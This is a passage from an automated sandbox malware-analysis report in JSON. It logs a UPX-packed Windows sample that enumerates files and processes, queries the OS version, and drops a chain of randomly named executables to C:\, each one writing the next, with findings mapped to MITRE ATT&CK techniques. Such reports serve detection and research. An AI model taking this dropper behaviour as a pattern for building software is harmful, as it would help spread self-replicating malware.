000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005868)\n \"660202.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100185e2100135e2100000000000000000000001900000000011ce312000000000080f0120095e14c77e02d0700feffffff435c507750595077aa000000b8000000125e2100105e2100a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c4f7760d86275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed50773a5e2100a06a267586000000a4e41200dce812000000000086008800a06a2675a4e41200916c26753a5e2100a06a2675a06a267514e9120002020000 (UID: 00000000-00005888)\n \"660202.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005888)\n \"trrtd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002400502f24004b2f2400000000000000000000001c00000000011ce312000000000080f0120095e14c77e92c0700feffffff435c507750595077aa000000b80000004a2f2400482f2400a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c4f7760d86275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5077722f2400a06a267586000000a4e41200dce812000000000086008800a06a2675a4e41200916c2675722f2400a06a2675a06a267514e9120002020000 (UID: 00000000-00006132)\n \"trrtd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006132)\n \"pdrvn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005976)\n \"pdrvn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002300e8ad2300e3ad2300000000000000000000001c00000000011ce312000000000080f0120095e14c774a520700feffffff435c507750595077aa000000b8000000e2ad2300e0ad2300a4e41200dce81200000000000000000000000000000000000000000000000000e019000000001c001c5c4f7760d86275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed50770aae2300a06a267586000000a4e41200dce812000000000086008800a06a2675a4e41200916c26750aae2300a06a2675a06a267514e9120002020000 (UID: 00000000-00005976)\n \"pdrvn.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005976)\n \"xjdpttx.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004296)\n \"xjdpttx.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000340000ae3400fbad3400000000000000000000002d00000000011ce312000000000080f0120095e14c77eb550700feffffff435c507750595077aa000000b8000000faad3400f8ad3400a4e41200dce81200000000000000000000000000000000000000000000000000e019000000002d001c5c4f7760d86275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed507722ae3400a06a267586000000a4e41200dce812000000000086008800a06a2675a4e41200916c267522ae3400a06a2675a06a267514e9120002020000 (UID: 00000000-00004296)\n \"xjdpttx.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004296)\n \"208464.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700d02d2700cb2d2700000000000000000000001f00000000011ce312000000000080f0120095e14c774c5b0700feffffff435c507750595077aa000000b8000000ca2d2700c82d2700a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c4f7760d86275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed5077f22d2700a06a267586000000a4e41200dce812000000000086008800a06a2675a4e41200916c2675f22d2700a06a2675a06a267514e9120002020000 (UID: 00000000-00006080)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter 620006.exe (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter 7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00006020)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00006020)\n \"620006.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005816)\n \"620006.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005816)\n \"620006.exe\" called \"FindNextFileW\" with parameter 620006.exe (UID: 00000000-00005816)\n \"620006.exe\" called \"FindNextFileW\" with parameter 7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe (UID: 00000000-00005816)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"620006.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lvhxj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pthnb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pdrvn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xjdpttx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"06462.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"2688428.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"642824.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rjjxrvl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lvvjfph.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"drlrf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xdhfnxr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"drjtt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6886668.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"42042.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"thpxfjv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fnnxblt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"62440.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"026424.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xddtpjj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ndhlfdh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fjtbx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"64288.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"226448.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" has an entrypoint in section \"UPX1\"\n \"ffffffr.exe\" has an entrypoint in section \"UPX1\"\n \"lvhrb.exe\" has an entrypoint in section \"UPX1\"\n \"bfltjr.exe\" has an entrypoint in section \"UPX1\"\n \"htplvld.exe\" has an entrypoint in section \"UPX1\"\n \"024046.exe\" has an entrypoint in section \"UPX1\"\n \"4088402.exe\" has an entrypoint in section \"UPX1\"\n \"046486.exe\" has an entrypoint in section \"UPX1\"\n \"282482.exe\" has an entrypoint in section \"UPX1\"\n \"pljnf.exe\" has an entrypoint in section \"UPX1\"\n \"thdjjv.exe\" has an entrypoint in section \"UPX1\"\n \"hhbbtl.exe\" has an entrypoint in section \"UPX1\"\n \"884648.exe\" has an entrypoint in section \"UPX1\"\n \"82440.exe\" has an entrypoint in section \"UPX1\"\n \"648086.exe\" has an entrypoint in section \"UPX1\"\n \"bnbhnh.exe\" has an entrypoint in section \"UPX1\"\n \"rjlbldf.exe\" has an entrypoint in section \"UPX1\"\n \"dndhhn.exe\" has an entrypoint in section \"UPX1\"\n \"688844.exe\" has an entrypoint in section \"UPX1\"\n \"464204.exe\" has an entrypoint in section \"UPX1\"\n \"442444.exe\" has an entrypoint in section \"UPX1\"\n \"644444.exe\" has an entrypoint in section \"UPX1\"\n \"26400.exe\" has an entrypoint in section \"UPX1\"\n \"286488.exe\" has an entrypoint in section \"UPX1\"\n \"482480.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" wrote 14149 bytes starting with PE header signature to file \"C:\\620006.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"620006.exe\" wrote 14165 bytes starting with PE header signature to file \"C:\\lvhxj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lvhxj.exe\" wrote 14176 bytes starting with PE header signature to file \"C:\\pthnb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pthnb.exe\" wrote 14190 bytes starting with PE header signature to file \"C:\\00802.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"00802.exe\" wrote 14210 bytes starting with PE header signature to file \"C:\\660202.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"660202.exe\" wrote 14229 bytes starting with PE header signature to file \"C:\\trrtd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"trrtd.exe\" wrote 14248 bytes starting with PE header signature to file \"C:\\pdrvn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pdrvn.exe\" wrote 14262 bytes starting with PE header signature to file \"C:\\xjdpttx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xjdpttx.exe\" wrote 14276 bytes starting with PE header signature to file \"C:\\208464.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"208464.exe\" wrote 14290 bytes starting with PE header signature to file \"C:\\82064.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"82064.exe\" wrote 14302 bytes starting with PE header signature to file \"C:\\886408.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"886408.exe\" wrote 14314 bytes starting with PE header signature to file \"C:\\42242.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"42242.exe\" wrote 14329 bytes starting with PE header signature to file \"C:\\848482.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"848482.exe\" wrote 14345 bytes starting with PE header signature to file \"C:\\06462.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"06462.exe\" wrote 14363 bytes starting with PE header signature to file \"C:\\2688428.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2688428.exe\" wrote 14380 bytes starting with PE header signature to file \"C:\\0882288.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0882288.exe\" wrote 14391 bytes starting with PE header signature to file \"C:\\642824.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"642824.exe\" wrote 14411 bytes starting with PE header signature to file \"C:\\rjjxrvl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rjjxrvl.exe\" wrote 14423 bytes starting with PE header signature to file \"C:\\pdtrht.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pdtrht.exe\" wrote 14441 bytes starting with PE header signature to file \"C:\\lvvjfph.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lvvjfph.exe\" wrote 14452 bytes starting with PE header signature to file \"C:\\drlrf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"drlrf.exe\" wrote 14472 bytes starting with PE header signature to file \"C:\\xdhfnxr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xdhfnxr.exe\" wrote 14490 bytes starting with PE header signature to file \"C:\\drjtt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"drjtt.exe\" wrote 14504 bytes starting with PE header signature to file \"C:\\6886668.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6886668.exe\" wrote 14520 bytes starting with PE header signature to file \"C:\\42042.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"42042.exe\" wrote 14536 bytes starting with PE header signature to file \"C:\\thpxfjv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"thpxfjv.exe\" wrote 14554 bytes starting with PE header signature to file \"C:\\blvpbn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"blvpbn.exe\" wrote 14570 bytes starting with PE header signature to file \"C:\\txjxfrd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"txjxfrd.exe\" wrote 14585 bytes starting with PE header signature to file \"C:\\fnnxblt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fnnxblt.exe\" wrote 14601 bytes starting with PE header signature to file \"C:\\64268.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"64268.exe\" wrote 14614 bytes starting with PE header signature to file \"C:\\62440.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"62440.exe\" wrote 14631 bytes starting with PE header signature to file \"C:\\64402.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"64402.exe\" wrote 14641 bytes starting with PE header signature to file \"C:\\026424.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"026424.exe\" wrote 14659 bytes starting with PE header signature to file \"C:\\880446.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"880446.exe\" wrote 14675 bytes starting with PE header signature to file \"C:\\xddtpjj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xddtpjj.exe\" wrote 14692 bytes starting with PE header signature to file \"C:\\hlrdfx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hlrdfx.exe\" wrote 14709 bytes starting with PE header signature to file \"C:\\ndhlfdh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ndhlfdh.exe\" wrote 14722 bytes starting with PE header signature to file \"C:\\fjtbx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fjtbx.exe\" wrote 14734 bytes starting with PE header signature to file \"C:\\4222660.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4222660.exe\" wrote 14754 bytes starting with PE header signature to file \"C:\\42402.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"42402.exe\" wrote 14764 bytes starting with PE header signature to file \"C:\\64288.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"64288.exe\" wrote 14779 bytes starting with PE header signature to file \"C:\\226448.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"226448.exe\" wrote 14797 bytes starting with PE header signature to file \"C:\\60644.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"60644.exe\" wrote 14816 bytes starting with PE header signature to file \"C:\\08240.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"08240.exe\" wrote 14827 bytes starting with PE header signature to file \"C:\\860482.exe\": 